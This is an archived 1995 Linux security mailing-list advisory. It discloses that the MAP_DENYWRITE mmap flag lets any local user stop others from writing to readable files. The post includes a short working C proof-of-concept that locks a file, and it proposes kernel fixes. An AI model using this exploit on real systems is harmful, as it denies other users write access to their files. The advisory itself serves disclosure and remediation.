[308] in linux-security and linux-alert archive
MAP_DENYWRITE allows denial-of-service
daemon@ATHENA.MIT.EDU (Ian Jackson)
Mon Aug 7 14:43:56 1995
Date: Sun, 6 Aug 95 16:11 BST
From: Ian Jackson <iwj10@cus.cam.ac.uk>
To: linux-alert@tarsier.cv.nrao.edu, linux-kernel@vger.rutgers.edu
[mod: This was originally posted to linux-alert. We redirected it to
linux-security for now until there is a fix for this problem. --okir]
-----BEGIN PGP SIGNED MESSAGE-----
(Posted to linux-alert and linux-kernel.)
Any user on a Linux system can prevent other users from writing to
files. The files need not be writeable by the attacker, but they do
need to be readable. They do not need to be in any special format or
have any particular name or permission flags.
There is no practical limit to the number of files a user can `block'
like this, and the program to do it is trivial - see below.
While the program is running any otherwise-OK attempt to open the file
for writing gets ETXTBSY (Text file busy).
The problem exists in at least 1.2.10, and I'm told that this feature
was introduced quite some time ago.
The MAP_DENYWRITE feature was apparently added to allow (for example)
ld.so to arrange that libraries and other executable files which were
in use could not be overwritten. While this seems like a laudable
aim, it does not justify what we see here. I suggest that the feature
be removed completely. If this is thought undesirable checks will
have to be made - at the very least that the user doing the mapping
has `x' access to the file, and that the file is in a suitable format.
Ian.
/* Invoke this as `./a.out < file-to-be-blocked'.
* Send it a signal when you want to unblock the file.
*/
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/mman.h>
int main(void) {
caddr_t a;
a= mmap(0,1,PROT_READ,MAP_DENYWRITE|MAP_FILE|MAP_SHARED,0,0);
if (a == (caddr_t)-1) { perror("mmap"); exit(1); }
printf("mapped at %p\n",a);
pause();
return 0;
}
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMCTbUcMWjroj9a3bAQG2mwQAlLOER9wipKqg5i4CTAxeOJEQu2G9Yy4H
KRIwBzxDA7lvD+tUglB5CMyosrDqTrnLTTomUlpuJkqVZoH0ugeQduvxe/9vjr5E
pztfC7O/b+DdqUhQBBjNczJlXWzqoMpBaqKW75ny3Mj5rTR7cw2EkjCBX243x7Io
Vr9qW6vQiRw=
=UZZP
-----END PGP SIGNATURE-----
